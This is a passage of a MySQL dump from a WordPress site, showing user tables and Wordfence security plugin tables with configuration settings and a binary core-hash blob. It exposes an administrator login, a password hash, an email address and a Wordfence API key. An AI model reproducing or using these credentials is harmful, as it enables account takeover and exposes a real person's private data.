here</a>.\";s:7:\"options\";a:9:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:17:\"wpseo-dismiss-gsc\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(32,1,'wp_wpseo-upsell-notice','seen'),(33,1,'wpseo-dismiss-configuration-notice','yes'),(34,1,'wp_wpseo-dismiss-gsc','seen'),(35,1,'closedpostboxes_page','a:1:{i:0;s:13:\"pageparentdiv\";}'),(36,1,'metaboxhidden_page','a:4:{i:0;s:10:\"postcustom\";i:1;s:16:\"commentstatusdiv\";i:2;s:7:\"slugdiv\";i:3;s:9:\"authordiv\";}'),(37,1,'last_login_time','2021-08-23 21:53:51'),(38,1,'wfls-last-login','1629755631'),(39,1,'default_password_nag','');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'nothinghappenign','$P$Bx03kaVCOrlXTsS5wGlDZt6RwVyJGu0','westonspirit','bensykes@bensykes.co.uk','','2018-04-02 18:30:58','',0,'westonspirit');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblockediplog`
--

DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblockediplog`
--

LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0��%\0','NL',2,18843,'waf'),('\0\0\0\0\0\0\0\0\0\0��%\0','NL',3,18850,'waf'),('\0\0\0\0\0\0\0\0\0\0��4�6','US',36,18838,'waf'),('\0\0\0\0\0\0\0\0\0\0��4�6','US',30,18839,'waf'),('\0\0\0\0\0\0\0\0\0\0��4�6','US',65,18840,'waf'),('\0\0\0\0\0\0\0\0\0\0��4�6','US',36,18841,'waf'),('\0\0\0\0\0\0\0\0\0\0��M�N','GB',4,18840,'waf'),('\0\0\0\0\0\0\0\0\0\0��_i}T','RU',3,18845,'waf'),('\0\0\0\0\0\0\0\0\0\0���7L�','DE',3,18837,'waf'),('\0\0\0\0\0\0\0\0\0\0���7��','DE',1,18837,'waf'),('\0\0\0\0\0\0\0\0\0\0���7��','DE',1,18838,'waf'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',1,18857,'waf'),('\0\0\0\0\0\0\0\0\0\0��Å(.','CZ',3,18850,'waf');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblocks7`
--

DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblocks7`
--

LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfconfig`
--

DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfconfig`
--

LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','b:0;','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:0:{}','yes'),('apiKey','a62c232de56d29aba3f0c0476ac513ffb114a7452930f723d281531f144f6191b0f5e5c29dd1437d5f24676030324390033abd2be9432cd849357f9bf0cf42ed2af6a8bd7f78a1208193bb2ddeda5638','yes'),('autoBlockScanners','1','yes'),('autoUpdate','0','yes'),('autoUpdateAttempts','0','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1c85c1bb49','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0\Z��a:2:{s:4:\"hash\";s:64:\"c947153e029a74c6d8d1caa85e4aec46022fe0152ffb1dfc23ea508d9e9fe9c4\";s:6:\"hashes\";s:136448:\"\0���W7���ht#�	��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q�޹��\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q	ȐN��5��H�\0�9�w�i����5�������}���h��\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6��	�j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$�	�4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��ƒy�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{�����˜�5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p����pHa�P0�4��D�!�2�{�F�͹|���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u	re4�+JuP$,�WN��P�2�\"Ş�,|^��y޲���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_�	�Q�������oS�nn�̵v�\0)�������Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W:	�Sx�Dq5��/w��_W:��+f�1z��g���\\Y��m�x�GO0���jo].㖽�B�=�f~:N���Fa6�ա�\nY ���\'��i���+�`��fGYbm��UP��M��J�ڡ0�&Cv��M�$����O��4-K�	o6�lb�1E�;�7x�?�-�DZ��Z�zE���*�nk���E�m@������1s��Y�#1$��\Z�=I�����b��XBr�?���ͥ-�!�i�>�[��e�V{�W�!F�P�b<&„A����8�`��]wB�κ��@kp&���h4ԛ�2����f\'�G���IS��}�}R⥅�JЛZ[`�m��I�$=�����D��֛&�Ǿ@�+բ��qO.���x&��*p���@��l����Β/kz=�i���� S����\Z\Z4ڶ1�5���2�3\r#?E�Q���L��Im$�Z��B\Z�!��&�͖��Ck�`7���\'/��]�i��5�\0�����2SC���+2��f!Og�ve�C�h����%%��-��)^\\���\0�t`�k��@���U�OŔ�cp��>�!8HB6������=�b���!��n�z\0�OS~K��|$��T����lJ�b�Ow������f\nT����Eg\ZU�\r����l{��SYD7I�.`��Ï}#٧���JKN��e�ӌ��&��ЎuѡIq�t���n~T	_j��-����%��?�7�0i���}�e�iZ�O�&E+rX�e�{e��mX��<�:�KSy{��r�>K^s�VS2o�H֏�_��)7�����z_oe���ŭy�^/?h;@r�K%��LP��f��c�(|�_]��U�͒o~ME��������s��Rp�d��F[��\'r�5l���蔝媀���s��@Z2]��i���](J~n�3��ϝ�ـ�hj��q�o�2��kL��JQ�c\0�8|V��A�����Nں�)\r�m�MA���D��os,����$���gJ	�Ŗ�7l}�a�������w|�gRLh!���1�R�&\'��k�D\':8YިK�Aa�-�RH�T���������(:�=ߤ\'\\�\0���|�8�(��]x�Z���vJ+�~�S�$ً6��vg�Aќ�ʋQ?�j�`J��N�]�0&��b�\0�V?9�����\"�.�I3�2r)rk�+`�NiM��2]<�	�h\n�˥���O��3�5F���\\�\0���,vS��+p\n�.����\r�J*RT	�!��A&��U�B�tG=_:\\�]>i��?η@ڹ�aKպ�*��Խ+]���ҮgƉ^62�G��\r�S��|�;)�$=X�n!����l=�@�A����:�V56U�x5�Px���&�:V�V��-qX��A9�M�4��-����t\n{���}�MI	AE0N������.T0b([���������oYd��%� �+�[�B��� f�<3)|���y-�d�����]`,5��l9�o���x��;����xZ���q@���51a�Ix���MOY�U�\r�Z�t�Kϭ�uJOyŹ�&Ҹ��*�ܲ�us#��t1��#4����䂹\Z��\'&�8�\0������m9;:��ͼ�f��f�)���I�;��Poi���=�DᎯ�0Sl�hsgܺ{�,��)\Z|����<�\n�x��*����i����`��h��`�P��*ͤ�!j1m!�~�J��\r�O�]��Y<�y�}�\Z�>ɺH���I|��P�����Bb��e�^��Έ;VT1��cj�] k^�O��9�A9�/�\Z�%�@b�.�`�� po��df��?�jr��Y��e|�H��h>�,�ec���R�es5-���D=��<��:3��ϩ�M���>���r�6�Ԥ��%z�uۇ7�}�F���[yx��]k��ݭ�Yr����9�IV,C2�\"���V�l��p�]l2�P�f>�Kp��֚J���bvw�`���*�w��}����*ʘ��)>2�q��e��^�)�P����n�GfR�@Ol,>iv�:�`�tQ�*�8\'�<��\n����J���;�H`�Q؝6pq���a�%��\r��	��\"�A�n�3H�Is�:Y��a�e0BҲy�Pp\nﭾ�����!Λ���&��Ʌ\'M��4�B�S���+\'�4&�$ء��Vgg��o��g~��m/�/&t+���s�����\"#:Z�ܯ4㓉&_&���6\"xF�|w`AZ_+vL\r}��N�P���6������_��Ұ�ݾ��l2�b���qÜ$U�v��	l,s���\"\r�m��`��Yד�U��X^�Ms���6R�H@�	&�冾�B�x��@d�R#U��O�Pg��sH�o�)n��Wr��t�Z�M���?%���V���D��Fv�@�����*9V���μ�[E��Bu}<�\Z#�d�4*�?���d�Q]Bx.|9D��:h@��Q��/U\0-|_ۢ1�g-�+����}�Ԙ!^iB���J��\\W�]�f��@@�w�=	.]��kZ1љm�G���]�x�0���	14\"1�Ix��GL�[	���>(G�A:���	64���� �2DM�M�$�\r澐i�\0���	8\\Ŭ�j�A��ʔ5�+X���o�T�m�_|	M��yu$�1�ck_�K�o�f��m���%�	g)[.�r\n�o�i�{4��Q\n\r8H�\rfX��	v�l���ٮ�!��P��m���\n6|ϔK	~�C�ȫ��7���:��s&u����j��t	�+�{R���ل���n�t,�Ǟ�`���|U�	�	��#t�̹��p=�I\"����)F	֓���-�\nqU��i���-�$�h*��m�l	�Vh���LC��»>U�8.�`�@<K��h	�Ϳ��U%�O�Hޡ�@�~x\\6��~�\n<�:�X�h�QAT����o��p2���8>�\n*��<��ӳ�?HM��\'V���L�\'[R�\n�@&��[DqS�������B��N#F�B��\n*An���.]�B��t�v�!�WҧMw�9�F\n+P_tQ�Vo����7n�\nz#�8�����J\nGk��~ng��m.�3\\�\n��1i��jgָ�\nv�?�u�	���f�h6�2B���?�2\03�}�\nx��m���nV=OD��\0T���)��U��\n}.�����v�e�\n�?�.z��E����+ɡ\n��\\_9(�)7�\n��/�S��\'�g߃�v���\n�9d���g��~@���|�B-�����ڐ�6=��\n�T�[Cp����(,�_V+�L\rۨI��(.��\n�s�H��чc �-y//�?�\r�$M̤j3\n�aqYK�JҔ΀p�\ZJ�j��\\P���\n�\n��ڷ�tn�\r�Ean�J;}(��ҙ���.��9\n�X:��Q�}�+�O�\\�_�	{�ܓC\'a�y:��\n�� �W\"���w�\05�S Nr������h\n�C��0�pFd���l�\0��\"u�~2\"�T��p\Z\n�v�[\0���XZppi�.��c�;~&���\n���&�)h4�_`�F�L��<��:`#pf���\n����RW#ވ� �Q��ē4E[�\'�z�\r��)��k���O�dS0�X�z���_����61k��K(��]1�z�ukpR�!������YC8���`dfh�.^8����!{��F�N�L{��z�)��,�\"�w�W�S��JDz���K�S����uᾒ�M��cc���cdD�(�Q��\\�\ra�[�J?T���?��G�d��(s������t�BUI+u���C�����R����SF2>�3`��v��\'�:js(��-N���֠����N�3����:�VS;���CT\n��]���C�rJ�2����m5CZ�\0�/@@1�1�D�ծ6��8g\n)e���z��l�1�MH��&��S��.>�U�B|2��ӜOU}��(԰�tc�2��ĒZV�R�顃[��l#4���>1ε��E���l|lh�����]���:�Yň�3	����\\gm̻�1)q+#���b�^0rR_Ҳ��Yn,��J�����́�T�NB�(�-��g��\\ICڞ�:r�n�̿�>Tw�D\n�Q�!�@iD��r��ȭ!wz��L{��J�y7-�m���G鴞Y�[����k��En#Xv�i�w�R��:�M�7K�kR��D����.�� L9��%�S���J*����n\'ͪt^���Vɹ�O�����*�(�����7Y��(V��z|%\0\'j����l���ص�$h�TC���՞N�8k�Ⱥ��y�*�<I\n����(���x�$���C\n��m�-B�����YVAlͼ2�VS�#n���X����6��X����DU�T�=��1O�@�,x�������� �)���\r�&�d5�s/,�\"�d��w22���\r��މ#<*Q�f��(�����\r%�P����cW�-:\'2�U�\'Ft�ݩz\r1?�;IB�=S��\Z�2֥͐�&�׆Z�B���\r5C�ٖ��N��s��k��l�\'t35����\rN��I�Y�����ԯ!���6)��I�Y\rQi�^�\ZB|��f��C���-/r��U�Y٢�B\rX�[cdpSs3�%.X��|A���w��#(JL\ra�{p�9����(A�)ˡ�̮SPV��s�6�#i\rnu���:Ft\Z��\"P9���qP���R��PA�\r���k�<vW�P�v��g(Hт��c�+d7\r�Y�t�W^���}rIxۯ�u��$�/dMk�\r�U��:�w����,���&�K�p&�\Z���\r�7Gٛ�r�Xyl�ﳠ<U5p8�n��\r›��Xd	D\n����q�bc�\Zu��\rٓ��C7,��<��p�,�L��~rY�s#�\r�\"�(qq�6�ZN��������ş&�h��\r�\n���*J��6������V^��%W\\�y�\'�h?I��I��3z(B�GQ#��`p�S:eJ�&�/�ʝ�aɋ��`�\n�}��\Z\\x�+�G\\%R���O��6���}�㕓悫�-�F�kRV��6���G_e\r��\"�}�Q^u�����YtY���sNl�dU|�7��t�U�FY���n�a�IWRH�j�wHBB����u�Xp\0b�Ue�$OrΰYe�JX�p�W	!��L�	o�Ѧ�?��11����]�Q[��7*�a�3�Ǿ�h��,�U���c�\\�ki����6u��J\n3*��Kv�i��A�&�4���=�D��q!蓸֧f;4��P�Z��e�O!�vx.e��8�jY�����0\Z����P�P1��S/���0�?�U!�͝�������6�??��Z��v�w=2H:�)x.���o\\��J��t�LU��o���L��~��)6�K�5S$ʂ8����⡧5g�g7�3lsuؾ�y���Z�wڠ�0YE\0����身i\\���|�����7��wq��;,r���L�X������\\35qv.R߼h<<���t�hD�$��\\1l$y�,��`p�M��j]#�W�B�Tm����F�M�(�b;ˏ�K���g�&\n�-��nzEja �#�[՝YdIdf@\\�K2o��؂/*�~�Hw�c@�2��,�����P�0������x`Ձ���dZvs�.��k�����\Z�5�\0��yX��$�j뤋��I��8���@t=��{9v��>:̷M\Z�ϵ����\rBt�\r�����3��i��0bn��j:�$L �g��r�a���������t��C �Y�\n��H���$$�T�̞}^�pfO]�ǭN3�%\r\\��-�A�J�K��K���7P�xe�\'�PH���H�P=,���L���N��}�\Z�E�O\\0�u��FOR\Z)ā���;S�\'bN<v�w�LSڻ�sT���|�>Q����i}�G�D���7��OF5�B�Nov���:A�_-3��x\ZJ�B�@k�y50���\n��Q�(��;�4�.���`R��w�|lS�Pp�k�G�M�8�����Թ��f�E�x;˝���O�[����J`uO�v&_���-]����E��;|��x$���(�t`\"���/\Z=�`>&�oR�֫��	�ڲ��}�Z	w�%��(�4)�;\r��;�)6qi9C��2��t�d64�Kծ�A�U)۳!���Pdlw�+���>�;��O��-L��hy��ML)\\VH��3_@AJ!�_��drN�d�G��;�Ϸ�6�<���wj�;�V��4dk�Է܏>�D��j�,p��k~*����d}�[����H�?�iK�[�i��/�(����^��\\���4��c-��Ȝ��)�͗�۷���@c.�V_;q���:uM���X���bW��Z`��E�ض\r�S��ky��%�/�-��u_EC�?o�Tg�NLC\"M�61ɿ�\\�)�j�i����]�m��b�#���6��C2���ao�2ᨁF���ˁL�W���%\rVJ~�p��$���P(��q��\0�RS�;\rs�}��o%��XOwR	�\\��B�;z����b#�q���l��E��S�WD��Lex��骴@m!��~���|d�ET9v,�Wы���ʀKK��#\0��f�羀G�~��p��oPq�9��\rbL\\9�2׬��n�*PP�\0A�w�:oH�RR�ES�G��ʏT-�a*Qf�,S�7��q��̓<�U*\";b�r���^�&��7j�Fő����ұy�ZA\"�Y�!�	=��x�`Jߩi.�?w~�/\"w�U{���Lf׏1:դy;�&ۆ޹[rD��b�Nv��㤄��\n�\Zwr��kHuE����N�/�JY���g�Si��)�N]o���}�0<��,���eS</�ܓ8C��T2I�UX�jF�\rPJ6�\\�d$Se=g�����۝JްS�0��il�ww�4�:����\"D�����=[��Z��\r���#�A@�f3�1_<���v����(QN��YCwo����}z�/�+x����\Z8��3�����ۀT�ё/��*�2^�oܰ�\n�0��\0��1�x?F(�8���V����/`8�І�Œ��t�2�:�]XK%�	EL��償�t�~�nF�^m���KY�N��\"�� �t�hR�D�P�>(�F-�$>Q���A*0l[U[����A7�E�OxƟ�:Y��{�� ��2g�Z��+j{�h���N�.m�۩+�6��r0���q��X�{4�a�����4����=P�Ҟ%^\\$��rf��z�;@h��謬&�f{��2�T��,Jg�~�KOb���H�$�(���\r_�\nt�l�	���6��Ax	�70)P;�\01���M{}i����E�ߍ\n�}HNf΍0/��,u��I������)�-[\0��=ֹ?�+;Q��/׬W/{����lDA��U��Rp�rmm\rF6��ط��i�(\":�@�c��:�<R)��%+:�����G%Cy*�m?۴�/�\r!����i�AHK2���w:�%.�;j@۴�)H&�R�װ���R��wci�F��z��\r_c;�QA���JR�Q6}���%�\0�w���Q1��h~�B��׺ʌ���ʤ!�g�y���{�8��٢��7\n��gT1��^0>�\r����劸֬+)��7X[_�u�۱H��]\"���¡`�nr�Xa�;�?~��R��q3��ٽ�R ���a�r\0��B<c�=OR��Š�v�B�n|J��In�;51V��SK��6ǐH��i�I�� (.fO��dx,�0Xl���J�.�*�Js�9��&�$����\rN�Z/�aU�Ə`�d�L�?�>C|����^v�s�_%�W���\rJ���*�f�zK�Hv��M,���,��z��㡫�?jk���[�0}��FW@�U0��W�gS��2c��FF�|�2`85�Sb�G?e?q7����#pjڥ|ɨ\0Y�����O|�aV3E�FW^@l�2�4K��<\\�/#\Z�����jp��!C��B��ڋTL�X�6�j��y�\Z\n�ё�4�W�\\\Z�T���M\\�V�dE��බ|@�]�)2ԕiq�j��\'�Vp�,�����K��zM�r#���6�h��q	:�@�߮�\r���0lҞ������6�j����Zm�c����-��k���Y���xJ��5����_�*���]O\\��s�M��\n�T��27���oڠC�g`c���˰m�upa�\\�|/J�y�2�fy2q�t�@W�k�mx�G���V͒�׵���pzk�訍�n!���>x�\\��h|�,�e�0?��s4n�,�Lmu��\Z�^΅hU}1}=�z��i��y\'\'|K��W?[�r(\r�\Z3���z�ػ�fW^P�1Y�2&��ۑpA�U���%�����f��G<�+HH4�ywy�\'hz�x�\"�v�\\�p�$��bo��)cH�vS��n_���(a��WcʹA���`k��BʜѮ,2���S��^ú�D��\Zѣ0?�ޖ�f�t��&�!-�U8��<��Gz�<3\0R�-k�,�u�׼)���\0��\n�9e\n!I9K�W���Ǽ?_�IaYOrg�Y����k?�R�0��}<�̤����.� ��$^$��m��w޻`.A�_[�rE��]�J�#��+ߘ�4�D���,E��ǡGf�y5ܟ@��nN��	�36�M���[�y�FRD�m��:�m�\\���,T�3y���?�P����Ԉ+o��Kqra��U�Wj�j�:M���S���C\0����E��pڎ�U=\\ف�2%����72B��9����9k���\r?r��qQe�-�=�������Ozγ�2z!���.�w���\ZFPA���SӃP��l�Z�N���!&��Qw�|�c;\0,2�aڢU��P��rY�o:W�3��\"6�uxh����S�ئ��3)]T�C��ˎ1B��\"$Ϥ_�Y[^�e\n��41��L��Hݩ�̨�<���W`��e���	�U�&�z�տR��B=P�Kq�F�u�~��\Z8�������W�2\0�	�e��`h��p�,��-n��}�;F��� \Z/q�@��Q!X�w>����7�.�l�8���le�Q,�������	n��a��TߌC�Ӏ#���������6�w�&��f�U�\n��`�Vr�{��YU��\"V1�	�]�98}�.�@�\rf[ɖ&����1^����gž+fV�`6)	�5��E��S�j������r�K����uj��%��p��A������9Xc<_:�l#�(�ǀv)ɣ�,��Ĺ��v�V-�n��z�W��E�2�D�����H�!~\\ꩠF�g�J\Zop\'�]Mi@����P;���VKi��V(�~n��&^VT�Sn���^��E��y	�u�\0ci�^Su�%�D�{o�x�\\4\'�1�0p��G&���o����AM�q��5�@�=�� �P�x��N^�+�5H9_r����?�MΩ�Դ�Y��5D`$Bfy�I�S�Wq؛��r�c�W��w\Z��(��&�=\r�eL�|)�a��j.��V��C6���\r��d�\n3[@�\r���܄\'Q�\nŒ�+�N�A΢���:W������<\'���d����SB�4,��h��ܟ+���{̗r�~a�Aďc��K�Aj�TG��/6���\n�]�<E&@Ƿ�(\0��a�{|�,��@�ha�Z�ݻ�����N/F]\0cOJh�ÙL�C�	�8׫hl�2�\"i\r2ӣ-୏�X�C +�R�a,��f6���!\\�I&C�#2M�8_6ws�E��U�P�[�Wґ��4L�{4��\Z��U��uw���\'�瞟�h�Q�i���5z\r�&�Ђ`~�\'\r�Q�l;4������e�c1b�0�w�~�{��wcj�|m]a_�����d�����4N��^�\\~��ʘ�����7q/\"]���$��&<Լ	�Q��Y�)���\ri\0\"4ߕml��\"W�K�x��I0$\r�!L7����K3@��\"[q���˯v�1 ���K&.��D,��p�	ڱ4zή)���F��\r8x���Nz$�wF��m��$\"�������]X����e��\"�?�|2�Y	Ō����t�-	����ࣟv�T�ը��2H`o�HPOn�uDpRֽ��R��nO��k2Ω@7 \'y�UٙK;�@I��:7}�.�a�	̑HMϩ:	qF�CO������c#�����y\r������<ե�l�4���֬�(�����w	�]���5�Fn?�`�b8�)���k�������(S;�w�Aq�^�;�T�ι�[�c��JD_��=$x�B�2냙$5)�S���jrx�V��IR-[�ҟ�1���.;\"��=1�(C]e(�d-|5QC��v��,�?�a�d���kV�l�EW���R*9��)7���m�v�X��bڷ\'�p	Z9@��S\r0,t`2�pl��s���W�����)�0�8aIpop�A��B��H�7�M����)�� ��J��Ob�\0�!�X�+c͎������Ǯ�ԑ8�@���G�h��ar6���r�V�B:�\'� 4-����I9��#�\"���iݔ[��-�l���+���\'2Y���U�~nZ����c�t�t�M�h?��Dm�%��ʋd�]��\Z���	MصB\Z��r�/O��5���%�N̶��\Z\n2��~���\n�\r���=a�⸬�]��7�\Z\n�Ŭ���W��O�O���,ԺN���E�\Z\r7�hZ����BLG���+���v�S�d��2�\Zi��\r���/�q�����uVc�x�-l�l�8\Z���Ú�Zþ��ި6���W2�lI�96G\Z�B�Xf\"�ԭ�����Oݠ�%�K3ѓ93h�\Z�4�2o^i���w�$Se(I��}P�((�\ZQ\n�S���^M\0�Ù]M\Z��`:���c\ZTcς�6[�L�B�c�l��\rx��R()��a?\Z[I���ʙ`:�}���V\Z���T�Dn��+�/`{\Z^\\%��k��O������e�i��:�i����o\ZqR�T�=�\0��,�\ZXD픚�\Z�h����K8h\Zxy7�{�� ������zQ1+5:#Mu<�\Z�dh�ƨ,Ȋ��a���ܑ��iK��#�A\Z�t��Y-{RV ۷FR��!�%8��`�?O\Z�Ia�^���iJ��H�:�j�:���b�Š�\Z��;4JpRӗ���ڎX�V\\�2p&����\n\Z��mҴ`S��|����0	S�s���EA�L�\Z䜫��:��H2fם[�Jm<����x�<�0�\Z�7�����۴��>�0�X����Ϙ���\Z�AS��[�[��kn/�:�%��>\Z\'��_\Z��K���G�Um�0�;A�򳡆���-v�n�\0]�І��{l�CMv�ɾ@�ƑT�97C�=y�Z����3��Ή�c3m��!�p�r����&,��Y*��l}J�px5K�5&\0CRdR5P,B�a#1�Qf\Z\r�݊�P[��Y�